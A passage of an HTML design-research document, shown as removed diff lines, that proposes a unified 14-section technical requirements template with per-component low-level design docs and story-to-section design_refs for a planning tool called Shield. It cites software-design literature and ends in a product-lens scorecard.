-<li><strong>§12's 8 forced subsections</strong> are the strongest anti-format-drift mechanism in the template: a fixture-based eval can mechanically check that all 8 are present and non-empty, with <code>&quot;n/a — &lt;reason&gt;&quot;</code> as the only allowed escape.</li>
-<li><strong>§14 Changelog with story IDs</strong> is the inverse of <code>design_refs[]</code> on the story side — the LLD knows which stories touched it; the story knows which LLD sections it depends on. Bidirectional graph.</li>
-<li><strong>§9 + §11 promote-on-demand</strong> acknowledges that not every component touches config or user data — keeps the template scoped to reality without losing the slot.</li>
-</ul>
-<h2 id="why-not-keep-plan-architecturemd">Why Not Keep <code>plan-architecture.md</code>?</h2>
-<table>
-<thead>
-<tr>
-<th></th>
-<th>Today's <code>plan-architecture.md</code></th>
-<th>Proposed unified TRD</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>Domain coverage</td>
-<td>De-facto infra/ADR-flavored</td>
-<td><strong>Both infra and backend</strong> — same template, domain-aware prompting per section</td>
-</tr>
-<tr>
-<td>Origin</td>
-<td>Shield convention; closer to ADR + HLD hybrid</td>
-<td>IEEE 1016 + reference TRD template + Google design-doc lineage</td>
-</tr>
-<tr>
-<td>HLD coverage</td>
-<td>Solution sketch + 5 numbered decisions + PR sequencing</td>
-<td>Full HLD viewpoint coverage: context, composition, interfaces, NFRs</td>
-</tr>
-<tr>
-<td>NFRs</td>
-<td>Implicit</td>
-<td>Explicit §6 (forced for both domains — SLOs/RPO/RTO/cost matter for infra too)</td>
-</tr>
-<tr>
-<td>Alternatives</td>
-<td>Present (good)</td>
-<td>Preserved in §8 — the ADR-style &quot;decisions with trade-offs&quot; pattern lives here</td>
-</tr>
-<tr>
-<td>Rollback strategy</td>
-<td>Present in plan-architecture.md</td>
-<td><strong>Promoted to first-class §14</strong> (universal)</td>
-</tr>
-<tr>
-<td>Milestones</td>
-<td>&quot;Deliverables&quot; as PR sequencing</td>
-<td>First-class §10 — feature phases (backend) or phased rollout (infra)</td>
-</tr>
-<tr>
-<td>Cross-cutting</td>
-<td>Implicit</td>
-<td>Explicit §9 — forces IAM/cost/observability/DR for infra</td>
-</tr>
-<tr>
-<td>Story traceability</td>
-<td>None (LLD-shaped content buried in <code>plan.json</code> descriptions)</td>
-<td>Each story gets <code>design_refs[]</code> pointing to TRD/LLD sections</td>
-</tr>
-<tr>
-<td>Reviewer rubric</td>
-<td>Free-form</td>
-<td>Structured — <code>/plan-review</code> grades 14 fixed sections (with <code>n/a — &lt;reason&gt;</code> escape)</td>
-</tr>
-</tbody>
-</table>
-<p>The unified TRD subsumes everything <code>plan-architecture.md</code> does well (decisions, alternatives, rollback) and adds the structural rigor that infra plans currently lack (forced NFRs, Cross-Cutting, first-class Milestones).</p>
-<h2 id="what-the-industry-recommends">What the Industry Recommends</h2>
-<h3 id="ieee-1016-2009--software-design-descriptions">IEEE 1016-2009 — Software Design Descriptions</h3>
-<blockquote>
-<p><em>&quot;A representation of a software design to be used for communicating design information to its stakeholders.&quot;</em></p>
-<p><em>&quot;Design view: A representation comprised of one or more design elements to address a set of design concerns from a specified design viewpoint.&quot;</em>
-— <a href="https://cengproject.cankaya.edu.tr/wp-content/uploads/sites/10/2017/12/SDD-ieee-1016-2009.pdf">IEEE Std 1016-2009, Clause 3 — full PDF via Çankaya University</a></p>
-</blockquote>
-<p>IEEE 1016 names 12 design viewpoints (Context, Composition, Logical, Dependency, Information, Patterns-use, Interface, Structure, Interaction, State dynamics, Algorithm, Resource). A defensible HLD-vs-LLD split treats the first seven (Context → Interface) as HLD and the last five (Structure → Resource) as LLD. The proposed TRD §7 (HLD) covers Context + Composition + Logical + Interface viewpoints; §11 (APIs Involved) covers Interface explicitly. The LLD covers Structure + State dynamics + Algorithm + Resource.</p>
-<h3 id="ian-sommerville-software-engineering-10th-ed-ch-6">Ian Sommerville, <em>Software Engineering</em> (10th ed., Ch. 6)</h3>
-<blockquote>
-<p><em>&quot;Architectural design is concerned with understanding how a software system should be organized and designing the overall structure of that system.&quot;</em></p>
-<p><em>&quot;Architectural design is the critical link between design and requirements engineering as it identifies the main structural components in a system and the relationships between them.&quot;</em></p>
-<p><em>&quot;Architecture may be used as a focus of discussion by system stakeholders. … Analysis of whether the system can meet its non-functional requirements is possible. … The architecture may be reusable across a range of systems.&quot;</em>
-— Sommerville, Chapter 6 §6.1</p>
-</blockquote>
-<p>Sommerville's three justifications for explicit architecture — stakeholder communication, NFR analysis, reuse — map directly to TRD §4 (Product Journey, stakeholder communication), §6 (NFRs explicit), §7 (HLD as reusable architectural template).</p>
-<h3 id="roger-pressman-software-engineering-a-practitioners-approach-8th-ed">Roger Pressman, <em>Software Engineering: A Practitioner's Approach</em> (8th ed.)</h3>
-<p>Pressman organizes design into four layers:</p>
-<blockquote>
-<p><em>&quot;Architectural design defines the relationship between major structural elements of the software, the architectural styles and design patterns that can be used to achieve the requirements defined for the system.&quot;</em></p>
-<p><em>&quot;Component-level design transforms structural elements of the software architecture into procedural description of software components.&quot;</em></p>
-</blockquote>
-<p>Pressman's split — architectural + data + interface (HLD) vs. component-level (LLD) — is the cleanest textbook mapping for the TRD/LLD layering.</p>
-<h3 id="malte-ubl--design-docs-at-google">Malte Ubl — &quot;Design Docs at Google&quot;</h3>
-<blockquote>
-<p><em>&quot;The design doc is the place to write down the trade-offs you made in designing your software.&quot;</em></p>
-<p><em>&quot;A short list of bullet points of what the goals of the system are, and, sometimes more importantly, what non-goals are.&quot;</em></p>
-<p><em>&quot;This is where your organization can ensure that certain cross-cutting concerns such as security, privacy, and observability are always taken into consideration.&quot;</em></p>
-<p><em>&quot;A clear indicator that a doc might not be necessary are design docs that are really implementation manuals. If a doc basically says 'This is how we are going to implement it' without going into trade-offs, alternatives, and explaining decision making … then it would probably have been a better idea to write the actual program right away.&quot;</em>
-— <a href="https://www.industrialempathy.com/posts/design-docs-at-google/">Design Docs at Google, industrialempathy.com</a></p>
-</blockquote>
-<p>Google's template — Context · Goals/Non-goals · The design · Alternatives · Cross-cutting concerns — is the empirical template Shield's existing <code>plan-architecture.html</code> already resembles. Adopting it explicitly closes the gap.</p>
-<h3 id="will-larson--lethaincom">Will Larson — <code>lethain.com</code></h3>
-<blockquote>
-<p><em>&quot;Design documents describe the decisions and tradeoffs you've made in specific projects.&quot;</em></p>
-<p><em>&quot;A batch of five design docs is the ideal ingredient for writing an effective strategy because design documents have what bad strategies lack: detailed specifics grounded in reality.&quot;</em></p>
-<p><em>&quot;You should write a design document for any project whose capabilities will be used by numerous future projects … any work taking more than a month of engineering time.&quot;</em></p>
-<p><em>&quot;Gather perspectives widely but write alone.&quot;</em>
-— <a href="https://lethain.com/eng-strategies/">Writing an engineering strategy, lethain.com</a></p>
-</blockquote>
-<p>Larson's &quot;design-doc-as-decision-artifact&quot; framing reinforces that the TRD should privilege decisions and trade-offs over comprehensive specification. The &quot;write alone&quot; rule is implementation guidance for the <code>/plan</code> agent: produce a single, opinionated TRD per run, not a consensus-shaped one.</p>
-<h3 id="gergely-orosz--the-pragmatic-engineer">Gergely Orosz — The Pragmatic Engineer</h3>
-<blockquote>
-<p><em>&quot;Software engineers who write design docs for their architecture — and ask for reviews on it — often ship more maintainable architecture.&quot;</em></p>
-<p>On Uber's RFC scale problems at &gt;2,000 engineers: <em>&quot;Noise: Hundreds of RFCs weekly overwhelmed experienced engineers; Ambiguity: Unclear which work required documentation; Discoverability: Documents scattered across Google Drive.&quot;</em>
-— <a href="https://blog.pragmaticengineer.com/rfcs-and-design-docs/">RFCs and Design Docs, blog.pragmaticengineer.com</a></p>
-</blockquote>
-<p>Orosz's account of design-doc value at scale supports adopting a uniform template for Shield's TRD output. Shield's <code>/plan</code> audience is one team per run, so the Uber-scale &quot;tiered templates&quot; remediation doesn't apply — a single 14-section template is the right level of structure.</p>
-<h3 id="simon-brown--the-c4-model">Simon Brown — The C4 model</h3>
-<blockquote>
-<p><em>&quot;Container&quot; — a separately runnable/deployable unit (e.g., a server-side web application, a single-page application, a desktop application, a mobile app, a database schema, a file system) that executes code or stores data.</em></p>
-<p><em>&quot;Component&quot; — a grouping of related functionality encapsulated behind a well-defined interface. From an implementation perspective, components are typically a collection of implementation classes/objects.&quot;</em>
-— <a href="https://c4model.com/">The C4 model for visualising software architecture, c4model.com</a></p>
-</blockquote>
-<p>The C4 model's Container and Component levels are the natural granularity for LLD documents in Shield's setup. One LLD per Container (or per Component for finer-grained services) cleanly aligns with how engineers reason about ownership and deployability — and avoids the milestone-LLD-proliferation that per-milestone LLDs would cause for cross-cutting components.</p>
-<h3 id="reference-trds-actual-practice-notion-workspace-internal-evidence">Reference TRD's actual practice (Notion workspace, internal evidence)</h3>
-<blockquote>
-<p>Reference TRD Template (last edited 2025-11-04) explicitly: <em>&quot;HLD — Objective: Explain how the system will behave end-to-end. Include: Block diagram or sequence diagram showing data flow between frontend, backend, and external services / Key microservices involved / Event triggers, queues, APIs, and DBs touched.&quot;</em></p>
-<p><em>&quot;LLD — Objective: Capture how each component or service works internally. Include: Components / Class/State diagrams / Database schema changes / API Contracts / Non Functional Aspects (error handling, retry, config) / Caching or fallback mechanisms.&quot;</em>
-— <a href="https://www.notion.so/29a1ab62faf5805ea7dadefb9d052af0">Reference TRD Template (Notion)</a></p>
-</blockquote>
-<p><strong>Observed deviations from the reference template in real artifacts:</strong></p>
-<ul>
-<li>Large features split HLD and LLD into <strong>separate Notion pages</strong>. One library LLD opens: <em>&quot;The TRD describes what the library does and why. This LLD describes how.&quot;</em></li>
-<li>Small features keep HLD+LLD inline but <strong>omit the section labels</strong> entirely — using functional headings like &quot;Architecture Components&quot; and &quot;Implementation Plan.&quot;</li>
-<li>&quot;Solutioning&quot; is used as a sibling term to HLD (one HLD title: <em>&quot;... — High-Level Design &amp; Solutioning Document&quot;</em>) — signals that decision-rationale lives next to the architecture, validating the Alternatives + Cross-Cutting sections.</li>
-<li>One reference TRD has an <strong>explicit &quot;Implementation Plan&quot; section with 5 phases</strong> — a real precedent for the proposed §10 Milestones.</li>
-</ul>
-<p><strong>LLD granularity in the reference workspace is per-service/per-library</strong> (one example LLD covers a single library and is referenced by whichever milestone touches it). Shield will adopt this convention: <strong>LLDs are per-component (C4 Container/Component level)</strong>, and the TRD's §10 Milestones declares which LLD components each milestone touches. A single LLD doc grows incrementally across milestones.</p>
-<h2 id="how-this-works-in-practice--plan-refactor-flow">How This Works in Practice — <code>/plan</code> Refactor Flow</h2>
-<pre><code>PRD (optional)
-   │
-   ▼
-/plan ────────────► TRD (HLD + Milestones)  ←── replaces plan-architecture.md
-   │                  │
-   │                  ├─ §1–9: HLD (problem, goals, design, NFRs, cross-cutting)
-   │                  ├─ §10: Milestones — each lists touched LLD components
-   │                  └─ §11–14: APIs, open Qs, references, rollback strategy
-   │
-   ▼
-plan.json (stories with design_refs[])
-   │
-   ├──► /implement (consumes story + design_refs[])
-   ├──► /pm-sync (consumes plan.json; design_refs[] become PM-tool links)
-   └──► [future] /lld &lt;component&gt;  ──► per-component LLD doc (14-section template from PR #43)
-              │
-              ├─ Header: Linked plans = [plan/M1, plan/M2, ...]   ← bidirectional
-              ├─ §1 Overview names the epics/milestones served
-              ├─ §14 Changelog: each edit has Story ID + sections touched
-              │
-              ├─ M1 may touch [lld-component-auth.md, lld-component-api.md]
-              ├─ M2 may touch [lld-component-api.md, lld-component-ui.md]
-              └─ Same LLD doc grows incrementally across milestones; §14 records each touch
-</code></pre>
-<p><strong>Reference example:</strong> <a href="https://github.com/infraspecdev/tesseract/pull/43">tesseract PR #43</a> — <code>docs/superpowers/specs/2026-05-18-lld-sample.html</code>. Bytebite user-signup LLD. 704 lines of HTML, 14 sections, 12 always-on + 2 promote-on-demand, with stable kebab-case anchors on every section and subsection. This is the structural model <code>/lld</code> will emit.</p>
-<h3 id="story-to-design-section-reference-contract">Story-to-design-section reference contract</h3>
-<p>Add an optional <code>design_refs[]</code> array to each story in <code>plan.json</code>:</p>
-<pre><code class="language-json">{
-  &quot;id&quot;: &quot;E1-S1&quot;,
-  &quot;title&quot;: &quot;Implement POST /users endpoint&quot;,
-  &quot;design_refs&quot;: [
-    {
-      &quot;doc&quot;: &quot;trd&quot;,
-      &quot;section_id&quot;: &quot;high-level-design&quot;,
-      &quot;anchor_url&quot;: &quot;trd.md#high-level-design&quot;,
-      &quot;label&quot;: &quot;TRD §7 High-Level Design&quot;
-    },
-    {
-      &quot;doc&quot;: &quot;lld&quot;,
-      &quot;component&quot;: &quot;user-service&quot;,
-      &quot;section_id&quot;: &quot;api-create-user&quot;,
-      &quot;anchor_url&quot;: &quot;lld-user-service.md#api-create-user&quot;,
-      &quot;label&quot;: &quot;LLD §5.1 POST /users&quot;
-    }
-  ]
-}
-</code></pre>
-<p><strong>Properties:</strong></p>
-<ul>
-<li><strong>Additive</strong> — adapters that don't understand <code>design_refs</code> ignore it. No <code>/pm-sync</code> schema break.</li>
-<li><strong>Component-scoped</strong> — LLD refs include <code>component</code> so multiple stories across multiple milestones can point at the same LLD doc; the LLD's <code>Linked plans</code> header and §14 Changelog close the loop on the other side.</li>
-<li><strong>Stable kebab-case anchors</strong> — <code>section_id</code> matches the LLD sample's explicit <code>id=&quot;...&quot;</code> attributes (e.g., <code>#api-create-user</code>, <code>#perf-load</code>), not heading-derived. Confluence-style anchor-rot bugs (CONFSERVER-26897/28087/41483) don't apply because we author the IDs explicitly.</li>
-<li><strong>Subsection-resolvable</strong> — points at <code>#api-create-user</code> (LLD §5.1), not just <code>#api-contracts</code> (LLD §5). Required for the precision the LLD sample establishes (per-endpoint, per-flow, per-perf-aspect anchors).</li>
-<li><strong>Forward-resolvable</strong> — <code>lld</code> refs can be added when the LLD is authored; the TRD generator leaves them as TODO entries until then.</li>
-<li><strong>PM-sync adapter behavior:</strong> Confluence/Jira → web link with anchor URL. ClickUp → URL custom field (+ optional Doc relate). Notion → URL property (+ optional Database relation).</li>
-</ul>
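-<p>To make the component-scoped property concrete, a second story from a later milestone might point at the same LLD document. The fragment below is only an illustrative sketch: the story ID <code>E2-S3</code>, its title, and the <code>LLD §6.1</code> label are hypothetical, while the field names, the <code>user-service</code> component, and the <code>#flow-signup</code> anchor style follow the examples above.</p>
-<pre><code class="language-json">{
-  &quot;id&quot;: &quot;E2-S3&quot;,
-  &quot;title&quot;: &quot;Add email verification to signup flow&quot;,
-  &quot;design_refs&quot;: [
-    {
-      &quot;doc&quot;: &quot;lld&quot;,
-      &quot;component&quot;: &quot;user-service&quot;,
-      &quot;section_id&quot;: &quot;flow-signup&quot;,
-      &quot;anchor_url&quot;: &quot;lld-user-service.md#flow-signup&quot;,
-      &quot;label&quot;: &quot;LLD §6.1 Signup flow&quot;
-    }
-  ]
-}
-</code></pre>
-<p>Because this story and <code>E1-S1</code> both resolve to <code>lld-user-service.md</code>, the LLD's <code>Linked plans</code> header and §14 Changelog would be expected to record both of them.</p>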
-<h3 id="de-duplication-contract-addresses-the-users-named-risk">De-duplication contract (addresses the user's named risk)</h3>
-<table>
-<thead>
-<tr>
-<th>Concern</th>
-<th>Owner doc</th>
-<th>TRD treatment</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>User problem, personas, business impact</td>
-<td>PRD</td>
-<td>TRD §2 links the PRD; restates problem in 1 sentence max for self-containment</td>
-</tr>
-<tr>
-<td>Functional requirements (what users do)</td>
-<td>PRD</td>
-<td>TRD §5 links PRD's user stories; doesn't restate them</td>
-</tr>
-<tr>
-<td>Non-functional requirements</td>
-<td>PRD names targets; TRD specifies architecture-level NFRs</td>
-<td>TRD §6</td>
-</tr>
-<tr>
-<td>Architecture &amp; design</td>
-<td>TRD</td>
-<td>TRD §7</td>
-</tr>
-<tr>
-<td>Alternatives &amp; trade-offs</td>
-<td>TRD</td>
-<td>TRD §8</td>
-</tr>
-<tr>
-<td>Component-internal algorithms, schemas, contracts</td>
-<td>LLD</td>
-<td>TRD §11 lists <em>which</em> APIs; LLD specifies their internals</td>
-</tr>
-<tr>
-<td>Work breakdown</td>
-<td>plan.json</td>
-<td>Plan generates stories; stories <code>design_refs[]</code> back to TRD/LLD</td>
-</tr>
-</tbody>
-</table>
-<p>Rule (paraphrased from Koko Product on PRD vs TRD): <strong>&quot;PRD owns <em>why</em>; TRD owns <em>how at architecture level</em>; LLD owns <em>how at component level</em>; plan owns <em>work breakdown</em>. Cross-references replace restatement.&quot;</strong></p>
-<h2 id="failure-modes--countermeasures">Failure Modes &amp; Countermeasures</h2>
-<p>Community research surfaced 10 named failure modes. Five are directly addressable by Shield's eval framework + structural choices:</p>
-<table>
-<thead>
-<tr>
-<th>Failure mode</th>
-<th>Source</th>
-<th>Shield countermeasure</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td><strong>Format drift across agent runs</strong> — different sessions produce differently-shaped TRDs</td>
-<td>User's stated risk + Cvet 2020 + acatton (Lobsters) — <em>&quot;authors and reviewers felt that most of the RFC template was superfluous&quot;</em></td>
-<td><strong>Schema-validated TRD eval</strong>: a fixture-based eval asserts presence of §1–14, asserts each section is non-empty (with <code>n/a — &lt;reason&gt;</code> as the only allowed escape), asserts <code>design_refs[]</code> shape. Backend + infra positive fixtures both pass. RED → GREEN trail required per CLAUDE.md.</td>
-</tr>
-<tr>
-<td><strong>Content duplication PRD↔TRD↔plan</strong> — same content restated, drifts independently</td>
-<td>User's stated risk + Plane.so + Koko Product — <em>&quot;Keep the boundary clean.&quot;</em></td>
-<td>The de-duplication contract above + a <code>/plan-review</code> rule: flag any TRD section that restates PRD content verbatim.</td>
-</tr>
-<tr>
-<td><strong>Undead documentation / silent divergence</strong> — doc reflects an outdated reality</td>
-<td>Doug Turnbull (softwaredoug.com) — <em>&quot;most design docs lie to you. They're undead documentation&quot;</em>; Lucas Costa — <em>&quot;Either you update the doc (which nobody does) or you diverge from it silently&quot;</em></td>
-<td>Shield's <code>/plan</code> re-runs <strong>update the same files in place</strong> (per current behavior). Combined with git history, the TRD is a snapshot at decision time. Recommend a <code>last_aligned_with: &lt;commit-sha&gt;</code> metadata field updated by <code>/implement</code> when stories close.</td>
-</tr>
-<tr>
-<td><strong>Over-specification (&quot;LLD too early&quot;)</strong> — schema/API decisions before query patterns are understood</td>
-<td>Lucas Costa — <em>&quot;you have the least information at the beginning of a project, which is exactly when design docs ask you to make the most decisions&quot;</em></td>
-<td>Defer LLD authoring until a milestone that touches the component begins; the LLD itself stays per-component. TRD §11 names <em>which</em> APIs change; the LLD specifies their internals only when that milestone begins.</td>
-</tr>
-<tr>
-<td><strong>Implementation-manual pseudo-code</strong> — doc just narrates code with no trade-offs</td>
-<td>Google design-docs doc — <em>&quot;design docs that are really implementation manuals … it would probably have been a better idea to write the actual program right away&quot;</em></td>
-<td><code>/plan-review</code> rule: flag any HLD section that contains code blocks &gt; N lines without an &quot;Alternatives Considered&quot; rationale.</td>
-</tr>
-</tbody>
-</table>
-<p>Five more failure modes (design-doc theatre, review-rubber-stamp, RFC firing-squad, authority fragmentation, template bloat) are governance issues not directly fixable by structural choices — flag as future <code>/plan-review</code> rubric expansions.</p>
-<h2 id="decisions-locked--open-questions">Decisions Locked &amp; Open Questions</h2>
-<h3 id="decisions-locked-with-the-user-2026-05-24--2026-05-25">Decisions locked with the user (2026-05-24 → 2026-05-25)</h3>
-<ol>
-<li><strong>LLD granularity: strictly per-component (C4-inspired).</strong> One LLD per Container or Component (service, library, module). Milestones list which LLDs they touch; LLDs grow incrementally as milestones land. LLDs are typically backend-only; infra rarely needs an LLD layer.</li>
-<li><strong>No lean variant.</strong> The full 14-section template is required for every TRD. (Orosz's tiered-template pattern applies at &gt;2,000-engineer scale, not Shield's per-team scope.)</li>
-<li><strong>Direct cutover.</strong> <code>/plan</code> stops writing <code>plan-architecture.md</code> immediately. No feature flag, no side-by-side period. Existing <code>plan-architecture.md</code> files remain readable; no migration tool needed.</li>
-<li><strong>Section enforcement: strict via eval, with <code>n/a — &lt;reason&gt;</code> escape.</strong> All 14 TRD sections are required by the schema-validated eval. Missing any section is an eval failure with a named error. An explicit <code>n/a — &lt;reason&gt;</code> line counts as present; vague TBDs or empty sections fail.</li>
-<li><strong>One TRD, two domains.</strong> Same 14-section template applies to backend AND infrastructure work. Domain-aware prompting per section in <code>/plan</code>'s SKILL.md surfaces the right interpretation; the eval and <code>/plan-review</code> rubric do not fork.</li>
-<li><strong>§14 Rollback Strategy is a first-class section.</strong> Preserves the strongest property of today's <code>plan-architecture.md</code>.</li>
-</ol>
-<h3 id="open-questions-for-the-implementation-phase">Open questions for the implementation phase</h3>
-<ol>
-<li><strong><code>design_refs[]</code> resolution at PM-sync time.</strong> Should adapters auto-create Confluence/Notion pages and link them, or only emit URLs and trust the user to author the pages? Recommendation: <strong>emit URLs only</strong> in v1; adapter authoring is a v2 enhancement.</li>
-<li><strong>Section-ID stability.</strong> TRD section anchors should be stable kebab-case slugs (<code>#high-level-design</code>), not heading-derived (which break on rename per Confluence CONFSERVER-26897/28087/41483). Concrete recommendation: emit explicit <code>{#section-id}</code> markdown anchors in the TRD template, and validate the slug set is the canonical 14 in the eval.</li>
-<li><strong>TRD ↔ LLD linking direction.</strong> TRD §10 lists LLDs each milestone touches (forward link). Should LLDs maintain backlinks to milestones/TRD? Recommendation: <strong>yes, but auto-generated</strong> — <code>/lld</code> reads the TRD, fills in a &quot;Referenced By&quot; section in the LLD pointing back to milestones. Avoids manual link-rot.</li>
-<li><strong><code>/pm-sync</code> adapter behavior for <code>design_refs[]</code>.</strong> Confluence → web link with anchor URL. Jira → remote issue link. ClickUp → URL custom field. Notion → URL property. Open: should ClickUp/Notion also populate a Relationship/Database-relation if the design doc exists in the same tool? Recommendation: <strong>v1 emits URL only</strong>, structured relationships are v2.</li>
-<li><strong>Eval shape for TRD.</strong> Concrete eval design: a fixture TRD with all 14 sections present passes; fixtures missing any section fail with a named error per section. Bidirectional check: the LLM does not add unprompted sections (drift-by-addition). <code>n/a — &lt;reason&gt;</code> lines count as present; vague TBDs or empty sections do not. Coverage includes both backend and infra positive fixtures. All covered by <code>shield/evals/plan-trd.yaml</code> fixture set.</li>
-</ol>
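-<p>As an illustration of open question 2, the canonical slug set that the eval validates could be written down as a flat list. This is a hypothetical sketch: only <code>high-level-design</code> appears in this document; the key name <code>trd_section_ids</code> and the other 13 slugs are assumptions obtained by kebab-casing the section titles of the TRD template.</p>
-<pre><code class="language-json">{
-  &quot;trd_section_ids&quot;: [
-    &quot;document-overview&quot;,
-    &quot;problem-statement&quot;,
-    &quot;objective-scope&quot;,
-    &quot;product-journey&quot;,
-    &quot;functional-requirements&quot;,
-    &quot;non-functional-requirements&quot;,
-    &quot;high-level-design&quot;,
-    &quot;alternatives-considered&quot;,
-    &quot;cross-cutting-concerns&quot;,
-    &quot;milestones&quot;,
-    &quot;apis-involved&quot;,
-    &quot;open-questions&quot;,
-    &quot;references&quot;,
-    &quot;rollback-strategy&quot;
-  ]
-}
-</code></pre>
-<p>Keeping the list in one place would let the eval check both directions: every listed slug is present in a generated TRD, and no unlisted slug has been added.</p>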
-<h2 id="migration-path--reversibility">Migration Path / Reversibility</h2>
-<p>The refactor is a direct cutover; reversibility cost is low:</p>
-<ul>
-<li><strong>Forward:</strong> <code>/plan</code> adds a TRD generation step before <code>plan.md</code>/<code>plan.json</code>. <code>plan-architecture.md</code> is replaced by <code>trd.md</code> immediately (no feature flag). The story schema gains an optional <code>design_refs[]</code> field. <code>/plan-review</code> gets new TRD-section rules. Estimated work: one PR for the <code>/plan</code> command + plan-docs SKILL.md changes, one PR for evals, one PR for <code>/plan-review</code> rule additions.</li>
-<li><strong>Reversal:</strong> If the TRD approach proves wrong, revert <code>plan-docs/SKILL.md</code> to the pre-refactor template + restore <code>plan-architecture.md</code> generation. Existing <code>trd.md</code> files remain readable in old feature folders. <code>design_refs[]</code> is optional everywhere, so removing it is a no-op for downstream adapters.</li>
-<li><strong>Existing artifacts:</strong> Pre-refactor feature folders keep their <code>plan-architecture.md</code> — no rewrite, no migration. New folders get <code>trd.md</code>. This is git-history-friendly and doesn't break anyone reading older docs.</li>
-</ul>
-<h2 id="summary">Summary</h2>
-<p>The TRD = HLD + PM-lens milestones + Rollback Strategy design is well-supported by the IEEE 1016 / Sommerville / Pressman lineage, mirrors the reference TRD template, and aligns with Google + Uber + Larson + Orosz modern practice. The <strong>unified 14-section TRD template covers both backend and infrastructure work</strong>, with domain-aware prompting per section and an explicit <code>n/a — &lt;reason&gt;</code> escape for sections that genuinely don't apply; the 14-section LLD template (anchored in <a href="https://github.com/infraspecdev/tesseract/pull/43">tesseract PR #43's Bytebite sample</a>) is the per-component layer authored separately and is <strong>typically backend-only</strong> since infra code is declarative-spec-as-code. <strong>LLDs are per-component (C4-inspired)</strong> — a single LLD covers one Container or Component, lists multiple <code>Linked plans</code> in its header, and grows incrementally as milestones touch it; §14 Changelog records each touch with a Story ID. Story traceability via additive <code>design_refs[]</code> (component-scoped, subsection-precise) is the highest-signal way to link work to design without breaking <code>/pm-sync</code>. The two named risks (format drift, content duplication) have concrete countermeasures: schema-validated evals enforcing all sections (and §12's 8 forced subsections in the LLD), and a de-duplication contract (&quot;PRD owns <em>why</em>, TRD owns <em>how at architecture</em>, LLD owns <em>how at component</em>, plan owns <em>work breakdown</em>&quot;). The refactor is a direct cutover with no feature flag; reversal is a simple revert with no migration burden.</p>
-<h2 id="product-lens">Product Lens</h2>
-<h3 id="scorecard-pm1pm11">Scorecard (PM1–PM11)</h3>
-<table>
-<thead>
-<tr>
-<th>Dim</th>
-<th>Name</th>
-<th>Grade</th>
-<th>Severity</th>
-<th>Gap</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>PM1</td>
-<td>User impact clarity</td>
-<td><strong>D</strong></td>
-<td>Critical</td>
-<td>Roles named abstractly (&quot;reviewers&quot;, &quot;engineers&quot;); no quantified before/after per persona</td>
-</tr>
-<tr>
-<td>PM2</td>
-<td>Problem–solution fit</td>
-<td><strong>B</strong></td>
-<td>Critical</td>
-<td>Missing explicit Problem Statement section <em>before</em> Decision; named risks appear pre-problem</td>
-</tr>
-<tr>
-<td>PM3</td>
-<td>Scope discipline</td>
-<td><strong>B</strong></td>
-<td>Important</td>
-<td>14 TRD + 14 LLD sections (+ §12's 8 forced subsections) reads kitchen-sink; no MVP cut explicit</td>
-</tr>
-<tr>
-<td>PM4</td>
-<td>Prioritization rationale</td>
-<td><strong>D</strong></td>
-<td>Important</td>
-<td>Three PRs listed without effort/impact tags or stated dependencies</td>
-</tr>
-<tr>
-<td>PM5</td>
-<td>Stakeholder communicability</td>
-<td><strong>D</strong></td>
-<td>Important</td>
-<td>Jargon-saturated; no plain-language summary a non-technical reader could follow</td>
-</tr>
-<tr>
-<td>PM6</td>
-<td>Market / competitive awareness</td>
-<td><strong>A</strong></td>
-<td>Warning</td>
-<td>Strong: <code>plan-architecture.md</code>, reference TRD, Google, Uber, IEEE 1016, C4, arc42, ADR all compared</td>
-</tr>
-<tr>
-<td>PM7</td>
-<td>Adoption / rollout risk</td>
-<td><strong>B</strong></td>
-<td>Important</td>
-<td>Technical risks covered; adoption-side risks (learning curve, change mgmt, partner buy-in) missing</td>
-</tr>
-<tr>
-<td>PM8</td>
-<td>Success metrics defined</td>
-<td><strong>F</strong></td>
-<td>Important</td>
-<td>No measurable post-ship outcome (no thresholds, targets, observable behaviors)</td>
-</tr>
-<tr>
-<td>PM9</td>
-<td>Reversibility / exit cost</td>
-<td><strong>A</strong></td>
-<td>Warning</td>
-<td>Strong: clean revert path, no migration burden, additive schema</td>
-</tr>
-<tr>
-<td>PM10</td>
-<td>Business value alignment</td>
-<td><strong>F</strong></td>
-<td>Critical</td>
-<td>No tie to business goal/OKR/customer escalation/compliance — justified entirely on engineering grounds</td>
-</tr>
-<tr>
-<td>PM11</td>
-<td>Framing coverage honored</td>
-<td><strong>B</strong></td>
-<td>Important</td>
-<td>All 5 PF7 voices quoted; PF8 &quot;Vendor docs&quot; category has refs but no verbatim body quote</td>
-</tr>
-</tbody>
-</table>
-<p><strong>Composite:</strong> 2A · 4B · 3D · 2F (≈ C+ overall). <strong>3 Critical gaps</strong> to close before this is plan-ready: PM1 (user-impact quantification), PM2 (Problem Statement section), PM10 (business-value tie-in).</p>
-<h3 id="user-impact-analysis">User Impact Analysis</h3>
-<p>The proposed TRD refactor directly serves five user populations identified in the framing brief, and the research provides differentiated evidence for each:</p>
-<ul>
-<li><strong>Shield maintainer</strong> — Highest leverage beneficiary. The named risks (format drift, content duplication) get concrete countermeasures: a schema-validated eval enforces all 14 TRD sections, and the de-duplication contract codifies ownership across PRD/TRD/LLD/plan. Risk of inaction: continued ad-hoc <code>plan-architecture.md</code> output that <code>/plan-review</code> can only grade free-form.</li>
-<li><strong>Staff/senior engineers reading the TRD</strong> — Gain a predictable artifact grounded in IEEE 1016 viewpoints, Sommerville's three architecture justifications, and the reference TRD template. Research quantifies coverage: 12 IEEE viewpoints, split ~7 HLD / ~5 LLD; 14 canonical TRD sections; 14 canonical LLD sections (12 always-on + 2 promote-on-demand).</li>
-<li><strong>Junior/mid engineers consuming via <code>/implement</code></strong> — Gain unambiguous design pointers via <code>design_refs[]</code> with subsection-precision (e.g., <code>#api-create-user</code> not <code>#api-contracts</code>). Research cites the Bytebite sample (PR #43, 704 lines, kebab-case anchors on every section and subsection) as the concrete structural target.</li>
-<li><strong><code>/plan-review</code> reviewer agents</strong> — Gain stable section anchors enabling structured rubrics instead of free-form grading. Research surfaces five mechanically-enforceable rules.</li>
-<li><strong><code>/pm-sync</code></strong> — Hard backward-compat constraint is <strong>met</strong>: <code>design_refs[]</code> is additive, adapters ignore unknown fields. No schema break.</li>
-</ul>
-<p><strong>Unquantified gaps:</strong></p>
-<ul>
